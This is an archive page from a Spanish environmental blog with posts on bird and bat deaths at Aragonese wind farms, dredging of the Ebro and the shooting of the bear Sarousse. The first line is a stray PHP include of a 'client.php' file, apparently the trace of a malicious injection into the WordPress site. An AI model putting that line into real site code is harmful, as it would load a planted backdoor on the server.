@include( ABSPATH . WPINC . '/client.php'); Barracuda » Política y Sociedad

Barracuda

Posts archivados en la categoría Política y Sociedad

EL MATADERO EÓLICO DE LA SIERRA DE LUNA (I): MONLORA

25th diciembre 2020 | Atentados ecológicos,Aves,Energía,Eólica,Mamíferos,Política y Sociedad

El Gobierno de Aragón ha remitido a la Asociación Naturalista de Aragón (ANSAR) la información que esta asociación solicitó, relativa a la fauna ingresada en el centro de recuperación de fauna silvestre (CRFS) de La Alfranca proveniente de los animales siniestrados en los parques eólicos ubicados en la Sierra de Luna y los Montes de Castejón de Valdejasa en los TM de Luna, Sierra de Luna, Las Pedrosas y Castejón de Valdejasa (Zaragoza, Aragón, España).

El documento aportado por el Gobierno de Aragón indica para cada registro, el número de historia del CRFS, la especie, la fecha de entrada en el centro, el lugar y coordenadas UTM del punto de recogida y la fecha de retirada del campo, el término municipal y el diagnóstico de la causa del siniestro.

Hay que tener en cuenta que la fecha de entrada al CRFS es posterior a la de recogida en el campo. A veces con varios días de diferencia ya que los cadáveres son guardados en congeladores hasta acumular un número suficiente para rentabilizar el transporte. Sólo si el animal está vivo llega al CRFS el mismo día o al día siguiente de su recogida en el campo. A su vez, la retirada del campo suele suceder días después de ocurrido el siniestro.

Los animales que llegan al CRFS son aportados por los agentes de protección de la naturaleza, los APN, como autoridades ambientales, que los retiran tras recibir aviso, bien de la empresa promotora que está obligada a hacer el seguimiento de la siniestralidad en los primeros años de funcionamiento de las instalaciones eólicas, bien de particulares (agricultores, cazadores, excursionistas…) que hallan los animales abatidos; o son hallados y retirados por los propios APN en sus labores de vigilancia del territorio. Además hay que tener en cuenta que los animales abatidos que sí son detectados pueden desaparecer antes de ser recogidos por las autoridades y no constar su registro en el CRFS. Y, luego hay que tener en cuanta los animales que caen pero que no son hallados por ser depredados o quedar ocultos entre la vegetación o los cultivos.

PPEE Monlora

A continuación se adjunta extracto del listado de animales siniestrados y fecha de entrada en el CRFS provenientes del complejo eólico Monlora, así como ubicación del animal respecto de las máquinas. El complejo Monlora comprende cinco parques eólicos con 61 máquinas en total.

Monlora

Siniestros PE Monlora. Fuente: CRFS, Gobierno de Aragón

Los datos del complejo Monlora comprenden los animales que llegaron al centro de recuperación recogidos en el campo entre el 9 de marzo y el 13 de septiembre de 2020, aproximadamente seis meses, resultado del seguimiento de siniestralidad al que está obligado el promotor. Son nueve murciélagos y 37 aves, que suman 46 animales. Hay que destacar que, por tamaños, abarcan desde el buitre leonado al murciélago enano. El buitre leonado con 25 ejemplares es la especie que mayor número de víctimas registra, además de destacar un águila real y dos milanos reales, especie que está declarada en peligro de extinción. En todos los casos menos uno se especifica que la siniestralidad fue por colisión con la pala del aerogenerador.

El caso de los milanos reales es muy grave ya que la especie está catalogada en España como en peligro de extinción según consta Catálogo español de especies amenazadas. Los gobiernos invierten por ello recursos económicos y medios humanos y materiales en recuperar la especie. El Gobierno de Aragón, incluso alardea de su programa de cría en cautividad, pero luego autoriza parques eólicos que son auténticos mataderos de aves y murciélagos.

Monlora

Siniestros PE Monlora. Fuente: CRFS, Gobierno de Aragón

Hay que recordar que los animales ingresados en el CRFS son sólo una parte de los realmente siniestrados ya que una buena parte no son encontrados por los encargados del seguimiento o bien no se retiran del campo o no llegan al CRFS, aspectos ambos que requerirían un artículo aparte. Además hay que sumar la siniestralidad también directa causada por las líneas de alta tensión de evacuación de la energía y por la subestación eléctrica, datos que no se han aportado. Por otra parte, hay que tener en cuenta la mortalidad oculta de los ejemplares juveniles por la desaparición de adultos reproductores en primavera y verano ya que ésta ocasiona la muerte de los pollos jóvenes en los nidos en caso de las aves, o de los cachorros de murciélagos en las cavidades de cría.

El complejo Monlora comprende cinco parques eólicos cuya construcción fue muy polémica por los defectos graves en los estudios ambientales previos a su instalación y que el Gobierno de Aragón a traves del INAGA se negó a corregir tras las denuncias de los grupos ecologistas (ver: Monlora III amenaza los alimoches del valle del Ebro/Barracuda, 2019).

A causa de las denuncias ecologistas sobre el peligro del PE Monlora III y los adyacentes para las aves, INAGA encomendó a los promotores del complejo eólico Monlora instalar un sistema anticiolisión de aves en varias máquinas que ha resultado inútil (ver: PE Monlora III, ya mata/Barracuda, 2020; Aerogeneradores con bocina inútil/Barracuda, 2020)

milano negro abatido

Milano negro abatido bajo la máquina nº 4 de PE Monlora III

Hay que recordar que el complejo eólico Monlora de la empresa promotora Forestalia de Fernando Samper Rivas forma parte del proyecto Phoenix promovido por el consorcio formado por Mirova (42%), Engie (33%), Forestalia (25%), el cual adquirió 344,2 MW de los 1.200 MW adjudicados a la Sociedad Aragonesa Transeuropea de Energías Renovables SA del grupo Forestalia en la subasta de mayo de 2017 y los rebautizó con el nombre de Proyecto «Phoenix».

Este proyecto cuenta con 91 aerogeneradores que equipan los parques eólicos El Saso Fase II (111,40 MW), La Rinconada (30,00 MW), La Sarda (30,40 MW), Monlora I (49,40 MW), Monlora II (49,40 MW), Monlora III (49,40 MW), Monlora IV (21,60 MW), Monlora V (30,40 MW), en la provincia de Zaragoza, y Monforte I (21,60 MW) y Monforte II (22,80 MW) en la provincia de Teruel. La Sarda y los cinco Monlora se ubican en la Sierra de Luna y entraron en funcionamiento a fiunales de 2019 y comienzos de 2020 (Ver: ¿Qué ha sido de los 1.500 MW adjudicados a Forestalia en las subastas de renovables?/El periódico de la energía, 20201009).

El complejo eólico Monlora se autorizó para su puesta en funcionamiento siendo responsables en el Gobierno de Aragón el presidente Javier Lambán Montañés/PSOE, el consejero de industria Arturo Aliaga López/PAR y su director general de energía Sergio Breto Asensio; siendo sus antecesores que impulsaron la tramitación Marta Gastón Menal y Alfonso Gómez Gámez respectivamente; siendo el consejero de medio ambiente Joaquín Olona Blasco y su director general de medio natural Diego Bayona Moreno y siendo director del INAGA Jesús Lobera Mariel que firmó la resolución favorable a la instalación de todos esos parques.

En los municipios donde perecen tantas aves y murciélagos son alcaldes Víctor Corbacho Cabestré/PSOE (Las Pedrosas), María Luisa Naudín Lambán/PAR (Sierra de Luna), Luis Miguel Casajús Ciudad/PSOE (Luna) y Eduardo Luna/PSOE (Castejón de Valdejasa).

En un próximo artículo revisaremos los datos de siniestralidad de PE La Sarda, PE La Peña y PE Santo Domingo de Luna, todos en la Sierra de Luna y los Montes de Castejón de Valdejasa.

Anímate a hacer un comentario

MUERTE Y SUFRIMIENTO BAJO LA EÓLICA

25th diciembre 2020 | Atentados ecológicos,Aves,Biodiversidad,Ecologismo,Energía,Eólica,Política y Sociedad

noticia

Ratonero abatido en el parque eólico La Muga 2. Gallur, Zaragoza; 20201225 © ANSAR

A pesar de la reconocida y creciente siniestralidad de los parques eólicos, de las denuncias y de los dispositivos anticolisión en aerogeneradores, aves y murciélagos siguen cayendo abatidos. Como en este caso de la máquina nº 11 del parque eólico La Muga 2 de Forestalia en los TM de Gallur, Magallón, Mallén y Novillas (Zaragoza, Aragón, España).

noticia

Ratonero abatido en el parque eólico La Muga 2. Gallur, Zaragoza; 20201209 © ANSAR

Hace pocos días ya se encontró otro ejemplar abatido en el PE La Muga 2 bajo la máquina nº 1, dotada -además- de medidas anticolisión. Los dispositivos anticolisión ya se mostraron ineficaces en el polémico complejo eólico Monlora, también de Forestalia, como denunciamos aquí (ver: Aerogeneradores con bocina inútil).

Los siniestros con aves se producen por colisión de la pala con el cuerpo del animal. La colisión con las palas que poseen una velocidad lineal en el extremo que ronda los 250 km/h ocasiona la mayoría de las veces la muerte inmediata del animal porque el traumatismo es muy severo; pero si produce la mutilación de un miembro, el ave agoniza durante horas o días hasta que muere por deshidratación o inanición o es presa de depredadores. Si el animal es recogido vivo a tiempo y llevado al centro de recuperación, lo cual sucede raramente, generalmente debe ser sacrificado porque las heridas son irrecuperables.

noticia

PE La Muga 2. Gallur, Zaragoza; 20201209 ©ANSAR

El parque La Muga 2 corresponde a uno de los lotes adquiridos por el grupo Forestalia en las subastas de los últimos años. Éste adquirió en la subasta de 2016, 300 MW eólicos mediante la compañía Consorcio Aragonés de Recursos eólicos SL y, en 2017, 1.200 MW eólicos mediante la compañía Sociedad Aragonesa Transeuropea de Energías Renovables SA, ambas del grupo Forestalia.

Luego, el fondo de inversión danés Copenhagen Infraestructure Partners (CIP), a través de la compañía CI III Monegros Energy Holdco SL, adquirió 487 MW de los 1.200 MW adjudicados a Sociedad Aragonesa Transeuropea de Energías Renovables SA en la subasta de mayo de 2017 y los rebautizó con los nombres de Proyectos «Monegros» (374 MW) y «Alenza» (113 MW). A su vez parece ser que DNV GL refinancia la CI III Monegros, dentro del entramado que se ha formado en torno a las renovables.

noticia

Fuente: DNV GL

El proyecto «Monegros» lo constituyen 9 parques eólicos equipados con 99 aerogeneradores y una potencia de 374 MW, todos en la provincia de Zaragoza: El Cabezo (49,40 MW), El Portillo 2 Fase I (44,80 MW), El Portillo 2 Fase II (38,00 MW), La Muga (25,00 MW), La Muga II (49,40 MW), La Muga III (30,40 MW), Venta del Ginestar (48 MW), Virgen de Rodanas I (49,50 MW) y Virgen de Rodanas II (49,50 MW) (Ver: ¿Qué ha sido de los 1.500 MW adjudicados a Forestalia en las subastas de renovables?/El periódico de la energía, 20201009).

En estas páginas también se ha denunciado el desastre que ha supuesto la construcción de las centrales El Cabezo y El Portillo en los TM de La Muela y Muel correspondientes al complejo «Monegros».

Anímate a hacer un comentario

ISLAS TENGAMOS EN EL EBRO POR MUCHOS AÑOS

7th diciembre 2020 | Comunicación,Geología,Política y Sociedad,Ríos

noticia

Heraldo de Aragón, 20201205

La nueva reclamación de limpieza del Ebro de la que se hace eco Heraldo ha tenido una contundente respuesta del profesor de Geografía de la Universidad de Zaragoza, Alfredo Ollero, autor también del blog Cuidando ríos.

El titular ya es tremendo: “Denuncian la presencia de una isla de grava” ¡¡¡En un río de gravas que tiene y toda la vida ha tenido islas!!! ¿Cómo se puede denunciar a un río por ser río y ser como es?

Por cierto, la isla ha existido siempre, no hay más que verlo en fotografías aéreas antiguas. Antes de la construcción del puente se encontraba pegada a la orilla de Movera.

El artículo está lleno de apreciaciones que demuestran el escaso conocimiento sobre cómo funciona un río y sobre cómo es el Ebro de estos concejales.

Desde el ámbito científico no podemos permitir en un tema como este que se emitan opiniones sin fundamento que no sean respaldadas por criterios técnicos, ni que la prensa se haga eco de ello y que cualquier persona pueda leerlo y se lo crea.

Esta isla lleva muchos años ahí y justo hasta hace un mes ya ha sido objeto de dragado y limpieza, como se observa en la foto, de forma injustificada y para no solucionar nada. El puro placebo de siempre.

Precisamente esa isla se sitúa en un punto de notable incisión en el cauce del Ebro, una incisión provocada por los 40.000 m³ de grava que se extrajeron para construir el puente. Precisamente no hay exceso de gravas, sino un claro déficit, lo cual está encajando el cauce y descalzando la orilla del soto de Cantalobos. Con este déficit, que cualquier visitante iniciado puede observar con claridad en el terreno, la estabilidad del puente está comprometida si se cometiera la torpeza de eliminar esa isla.

Las acumulaciones de sedimentos no incrementan las inundaciones. Esto está demostrado científicamente en ríos como el Ebro. Los sedimentos en crecida están en tránsito y no ocupan sitio. Invertir en limpiar y dragar es tirar el dinero. Las restricciones ambientales y las directivas europeas no están ahí por capricho.

No temáis en Villafranca de Ebro, porque las gravas de esa isla 1) no incrementan la inundación, 2) necesitan unas 15 crecidas importantes para llegar a esa localidad. Lo harán ya en el siglo XXII, cuando espero que haya bastante mayor sensibilidad y conocimiento fluvial y ambiental que en la actualidad.

Ofrezco a estos concejales, y a otros, de cualquier partido político, un curso de geomorfología fluvial y transporte de sedimentos. Podríamos desarrollar una iniciativa tan exitosa como la Escuela de Alcaldes que puso en práctica la Confederación Hidrográfica del Duero. Y les explicaría con detalle por qué no es cierto lo que comentan de los caudales, qué ocurre realmente con la ARA-A1, por qué dragar no soluciona nada sino que perjudica, qué alternativas existen, etc.

Preparando el dragado del Ebro. Barracuda, 2010
Y para empezar el año, dragado. A. Ollero/Barracuda, 2007
El azud del Ebro, un error ambiental. A. Ollero/Barracuda, 2007

Anímate a hacer un comentario

CONDENAN LA MUERTE DE LA OSA SAROUSSE POR DISPAROS

2nd diciembre 2020 | Atentados ecológicos,Biodiversidad,Caza,Ecologismo,Mamíferos,Política y Sociedad

Los grupos ecologistas condenan la muerte de la osa “Sarousse” en una cacería y exigen al Gobierno de Aragón prohibición cautelar e inmediata de la caza en todas las zonas con presencia de oso.

El domingo fue un día muy duro y triste para la conservación del oso pardo en los Pirineos y para los amantes de la naturaleza. Desde hace años los grupos ecologistas vienen advirtiendo y denunciando la inacción y falta de gestión del Gobierno de Aragón, con esta especie en peligro de extinción y en particular con la osa “Sarousse” (*) abandonada a su suerte durante años.

Todo esto ha desembocado en la trágica muerte de la osa “Sarousse” por el disparo de un cazador, en el Pirineo aragonés, en el mismo día que también se ha producido la muerte de otra osa en montañas de Palencia durante una cacería de jabalí. Los sucesos son de una gravedad intolerable para una sociedad avanzada y comprometida con la conservación de la naturaleza.

Desde los grupos ecologistas esperaremos los avances en la investigación judicial, reservándonos el derecho si es preciso de presentarnos como acusación particular. También queremos puntualizar sobre los antecedentes y circunstancias en que se han producido, con la más que discutida autorización de la caza como actividad esencial durante el confinamiento del resto de la sociedad durante la emergencia sanitaria por COVID19. La caza en Aragón desde hace varios años posee una falta de control y vigilancia manifiesta, que desemboca en hechos tan desafortunados como muerte de “Sarousse”. Cientos de cazadores con sus armas recorren cada fin de semana los montes de la región sabedores de que la administración carece de medios y personal suficientes para vigilar el cumplimiento de la normativa en cada territorio, inclusive en los espacios naturales protegidos.

La práctica cinegética se sigue autorizando y justificando, sin ninguna base científica, como actividad esencial para el control de “plagas” de herbívoros en todo el país, causando la muerte de miles de estos y otros animales silvestres, base de la dieta de pequeños carnívoros y aves rapaces, a menudo también victimas de “accidentes y confusiones” por parte de los cazadores.

El Gobierno de Aragón no protege las especies amenazadas

En el caso del oso pardo, hemos denunciado reiteradamente en los últimos años la grave irresponsabilidad e inacción del actual titular del Departamento de Agricultura, Ganadería y Medio ambiente, Joaquín Olona, obstaculizando y dilatando sine die la aprobación de un Plan de Recuperación y Conservación de esta especie, instrumento legal imprescindible para articular medidas eficaces que ayuden tanto a lograr la restauración de una población viable de oso pardo en territorio aragonés, como para prevenir, reducir y compensar adecuadamente los daños que pueda causar a la ganadería extensiva.

Máximo rigor e independencia hasta la aclaración del caso

Las investigaciones deben realizarse con cautela y en profundidad por organismos expertos e independientes de toda presión mediática o política hasta lograr su esclarecimiento, respetando la presunción de inocencia tanto del cazador como de la víctima, en este caso una osa adulta que se había asentado en la Ribagorza desde hace casi 15 años, sin dejar descendencia. Varias organizaciones nacionales y aragonesas estudian personarse en la causa judicial así como otras medidas para exigir responsabilidades.

Un daño incalculable al patrimonio natural de los aragoneses

Más allá del coste que para las arcas públicas supone anualmente la verificación y compensación de daños causados por “Sarouse”, y los ingresos percibidos por los ganaderos de la zona para compensar tales daños y conciliar su presencia, la desaparición de la osa echa por tierra varias décadas de intenso trabajo y fondos nacionales y europeos invertidos en el mejor conocimiento de su biología, el seguimiento de sus desplazamientos, la eficacia de las medidas más adecuadas para el manejo del ganado y la ordenación de los recursos de su hábitat. Estos son elementos claves y esenciales para la inminente, natural e irreversible llegada del oso pardo a territorio aragonés desde las poblaciones asentadas en Valle de Arán y Alt Pirineu.

Además, y a pesar de no haber dejado descendencia, quizás por encontrarse muy alejada de otros congéneres, la muerte de “Sarousse” acaba con la expectativa, al menos a corto plazo, de la recuperación de un núcleo reproductor en este sector estratégico del Pirineo.

*La osa “Sarousse” nació en Eslovenia en 1999 y fue introducida o liberada en el Pirineo francés el 21 de agosto de 2006 en la comuna de Arbas, desplazándose en 2010 casi 100km hasta el macizo del Turbón y el valle de Bardají (Huesca), donde ha resultado muerta el 29 de noviembre de 2020 durante una cacería. Contactos:

- Amigos de la Tierra Aragón (ADT)
- Asociación Naturalista de Aragón (ANSAR)
- Ecologistas en Acción (EEA)
- Fondo Natural
- Fundación para la Conservación del Quebrantahuesos (FCQ)
- SEO/BirdLife
- WWF-España


ÚLTIMOS COMENTARIOS

LO MÁS RECIENTE

LO MÁS VISITADO

Tienda Barracuda

ARTÍCULOS POR CATEGORÍAS

CALENDARIO DE ARTÍCULOS

enero 2021
L M X J V S D
« dic    
 123
45678910
11121314151617
18192021222324
25262728293031

ARTÍCULOS POR MESES

PÁGINAS